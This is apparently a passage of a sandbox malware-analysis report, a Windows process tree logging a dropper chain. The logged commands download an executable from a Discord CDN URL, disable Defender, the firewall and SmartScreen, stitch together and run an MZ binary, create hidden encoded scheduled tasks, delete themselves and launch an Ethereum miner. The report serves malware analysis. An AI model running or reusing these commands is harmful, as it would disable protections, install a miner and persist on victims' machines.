                                                                                                • C:\Windows\SysWOW64\curl.exe
                                                                                                  curl -O https://cdn.discordapp.com/attachments/864075800058789891/892369397816111135/Windows_Host.exe
                                                                                                  8⤵
                                                                                                    PID:3996
                                                                                              • C:\Users\Admin\Documents\_iwthQKn9nAdj0T28Lw5n5HS.exe
                                                                                                "C:\Users\Admin\Documents\_iwthQKn9nAdj0T28Lw5n5HS.exe"
                                                                                                6⤵
                                                                                                  PID:5884
                                                                                                  • C:\Users\Admin\AppData\Roaming\4256270.scr
                                                                                                    "C:\Users\Admin\AppData\Roaming\4256270.scr" /S
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4088
                                                                                                  • C:\Users\Admin\AppData\Roaming\2118840.scr
                                                                                                    "C:\Users\Admin\AppData\Roaming\2118840.scr" /S
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious behavior: SetClipboardViewer
                                                                                                    PID:5992
                                                                                                  • C:\Users\Admin\AppData\Roaming\5478727.scr
                                                                                                    "C:\Users\Admin\AppData\Roaming\5478727.scr" /S
                                                                                                    7⤵
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    PID:3608
                                                                                                  • C:\Users\Admin\AppData\Roaming\2897423.scr
                                                                                                    "C:\Users\Admin\AppData\Roaming\2897423.scr" /S
                                                                                                    7⤵
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    PID:3788
                                                                                                  • C:\Users\Admin\AppData\Roaming\6160157.scr
                                                                                                    "C:\Users\Admin\AppData\Roaming\6160157.scr" /S
                                                                                                    7⤵
                                                                                                      PID:1424
                                                                                                  • C:\Users\Admin\Documents\Eow9sch3bUzf_WXXvx7RU2Yr.exe
                                                                                                    "C:\Users\Admin\Documents\Eow9sch3bUzf_WXXvx7RU2Yr.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5972
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5972 -s 276
                                                                                                      7⤵
                                                                                                      • Program crash
                                                                                                      • Checks processor information in registry
                                                                                                      • Enumerates system info in registry
                                                                                                      PID:2564
                                                                                                  • C:\Users\Admin\Documents\llJVCyoEgJxuaB4XO_SNJcmN.exe
                                                                                                    "C:\Users\Admin\Documents\llJVCyoEgJxuaB4XO_SNJcmN.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4700
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS685A.tmp\Install.exe
                                                                                                      .\Install.exe
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:1428
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS77EA.tmp\Install.exe
                                                                                                        .\Install.exe /S /site_id "394347"
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Enumerates connected drives
                                                                                                        • Drops file in System32 directory
                                                                                                        • Enumerates system info in registry
                                                                                                        PID:5580
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                                                                                                          9⤵
                                                                                                            PID:6708
                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                              10⤵
                                                                                                                PID:6368
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                  11⤵
                                                                                                                    PID:6488
                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                      12⤵
                                                                                                                        PID:7024
                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                          13⤵
                                                                                                                            PID:7176
                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                      10⤵
                                                                                                                        PID:7660
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                          11⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:2480
                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                            12⤵
                                                                                                                              PID:8720
                                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                13⤵
                                                                                                                                  PID:2184
                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                            10⤵
                                                                                                                            • Checks processor information in registry
                                                                                                                            • Enumerates system info in registry
                                                                                                                            PID:5528
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                              11⤵
                                                                                                                                PID:8356
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                  12⤵
                                                                                                                                    PID:2232
                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                      13⤵
                                                                                                                                        PID:2260
                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                  forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                  10⤵
                                                                                                                                    PID:4028
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                      11⤵
                                                                                                                                        PID:4192
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                          12⤵
                                                                                                                                            PID:14128
                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                              13⤵
                                                                                                                                                PID:8380
                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                                                        9⤵
                                                                                                                                          PID:6200
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                                            10⤵
                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                            PID:5704
                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                              11⤵
                                                                                                                                                PID:3408
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I &del /Q *
                                                                                                                                                  12⤵
                                                                                                                                                    PID:8096
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN"
                                                                                                                                                      13⤵
                                                                                                                                                        PID:7728
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" EChO "
                                                                                                                                                        13⤵
                                                                                                                                                          PID:6264
                                                                                                                                                        • C:\Windows\SysWOW64\control.exe
                                                                                                                                                          control.exe ..\QVNGP.I
                                                                                                                                                          13⤵
                                                                                                                                                            PID:7892
                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                              "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\QVNGP.I
                                                                                                                                                              14⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              PID:3148
                                                                                                                                                              • C:\Windows\system32\RunDll32.exe
                                                                                                                                                                C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\QVNGP.I
                                                                                                                                                                15⤵
                                                                                                                                                                  PID:14260
                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\QVNGP.I
                                                                                                                                                                    16⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    PID:14312
                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                                                          11⤵
                                                                                                                                                            PID:5544
                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                                                        9⤵
                                                                                                                                                          PID:4288
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                                                            10⤵
                                                                                                                                                              PID:4000
                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                11⤵
                                                                                                                                                                  PID:4352
                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                  11⤵
                                                                                                                                                                    PID:7256
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /CREATE /TN "gtoMBhQwp" /SC once /ST 04:52:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                9⤵
                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                PID:2032
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 11:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\zJgrlXQ.exe\" uG /site_id 394347 /S" /V1 /F
                                                                                                                                                                9⤵
                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                PID:8020
                                                                                                                                                        • C:\Users\Admin\Documents\vRimKORg6sXDoijekzeZQRUR.exe
                                                                                                                                                          "C:\Users\Admin\Documents\vRimKORg6sXDoijekzeZQRUR.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          PID:4952
                                                                                                                                                          • C:\Users\Admin\Documents\vRimKORg6sXDoijekzeZQRUR.exe
                                                                                                                                                            "C:\Users\Admin\Documents\vRimKORg6sXDoijekzeZQRUR.exe"
                                                                                                                                                            7⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:1200
                                                                                                                                                          • C:\Users\Admin\Documents\vRimKORg6sXDoijekzeZQRUR.exe
                                                                                                                                                            "C:\Users\Admin\Documents\vRimKORg6sXDoijekzeZQRUR.exe"
                                                                                                                                                            7⤵
                                                                                                                                                              PID:888
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im vRimKORg6sXDoijekzeZQRUR.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\vRimKORg6sXDoijekzeZQRUR.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:2856
                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                    taskkill /im vRimKORg6sXDoijekzeZQRUR.exe /f
                                                                                                                                                                    9⤵
                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                    PID:8052
                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                    timeout /t 6
                                                                                                                                                                    9⤵
                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                    PID:7304
                                                                                                                                                            • C:\Users\Admin\Documents\CV3wZcym4qGbTCJGIrRdV3Uq.exe
                                                                                                                                                              "C:\Users\Admin\Documents\CV3wZcym4qGbTCJGIrRdV3Uq.exe"
                                                                                                                                                              6⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                              PID:4956
                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                7⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:3772
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:5408
                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                      timeout /T 10 /NOBREAK
                                                                                                                                                                      9⤵
                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                      PID:7616
                                                                                                                                                              • C:\Users\Admin\Documents\UjMxALCgOD36c61XgfZBL0C9.exe
                                                                                                                                                                "C:\Users\Admin\Documents\UjMxALCgOD36c61XgfZBL0C9.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:5020
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 264
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                  PID:6360
                                                                                                                                                              • C:\Users\Admin\Documents\GT4rJDknjBn1Q15NPVcLOGnM.exe
                                                                                                                                                                "C:\Users\Admin\Documents\GT4rJDknjBn1Q15NPVcLOGnM.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                PID:4188
                                                                                                                                                              • C:\Users\Admin\Documents\Mi7ACiBw_NKvp3OaVcQbL0ci.exe
                                                                                                                                                                "C:\Users\Admin\Documents\Mi7ACiBw_NKvp3OaVcQbL0ci.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                PID:3708
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\filename.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\filename.exe"
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                  • Drops startup file
                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                  PID:5300
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
                                                                                                                                                                    8⤵
                                                                                                                                                                    • Modifies security service
                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                    PID:3216
                                                                                                                                                                    • C:\ProgramData\UpSys.exe
                                                                                                                                                                      "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                                                                                                                                                                      9⤵
                                                                                                                                                                        PID:10600
                                                                                                                                                                        • C:\ProgramData\UpSys.exe
                                                                                                                                                                          "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                                                                                                                                                                          10⤵
                                                                                                                                                                            PID:12252
                                                                                                                                                                            • C:\ProgramData\UpSys.exe
                                                                                                                                                                              "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
                                                                                                                                                                              11⤵
                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                              PID:13176
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                                                                12⤵
                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                PID:13556
                                                                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                                                                          "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:10836
                                                                                                                                                                        • C:\ProgramData\Systemd\Database.exe
                                                                                                                                                                          -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                          PID:5168
                                                                                                                                                                        • C:\ProgramData\Systemd\Database.exe
                                                                                                                                                                          -epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                          PID:5884
                                                                                                                                                                    • C:\Users\Admin\Documents\9KzuhE7Lw8ZuxqLTgVWfZqc5.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\9KzuhE7Lw8ZuxqLTgVWfZqc5.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:4328
                                                                                                                                                                    • C:\Users\Admin\Documents\UjmEzzcdEw15G25sQGzbQOMX.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\UjmEzzcdEw15G25sQGzbQOMX.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                      PID:3976
                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\inst002.exe
                                                                                                                                                                        "C:\Program Files (x86)\Company\NewProduct\inst002.exe"
                                                                                                                                                                        7⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:5588
                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                                                                                                                                                        "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:3992
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\3996938.scr
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\3996938.scr" /S
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:6632
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\3308248.scr
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\3308248.scr" /S
                                                                                                                                                                              8⤵
                                                                                                                                                                              • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                              PID:6996
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\7105377.scr
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\7105377.scr" /S
                                                                                                                                                                              8⤵
                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                              PID:1568
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1793412.scr
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\1793412.scr" /S
                                                                                                                                                                              8⤵
                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                              PID:4080
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\5981140.scr
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\5981140.scr" /S
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:1044
                                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\cm3.exe
                                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
                                                                                                                                                                              7⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:2020
                                                                                                                                                                          • C:\Users\Admin\Documents\2Uz1J5c5sQRXrL2lNS7Xs_QF.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\2Uz1J5c5sQRXrL2lNS7Xs_QF.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                            PID:3180
                                                                                                                                                                          • C:\Users\Admin\Documents\3SIZP_yBJOASbSHbQAH4kgIc.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\3SIZP_yBJOASbSHbQAH4kgIc.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                            PID:4412
                                                                                                                                                                          • C:\Users\Admin\Documents\t6fnIyPK4SEmcNK1OEvBGBKz.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\t6fnIyPK4SEmcNK1OEvBGBKz.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:5436
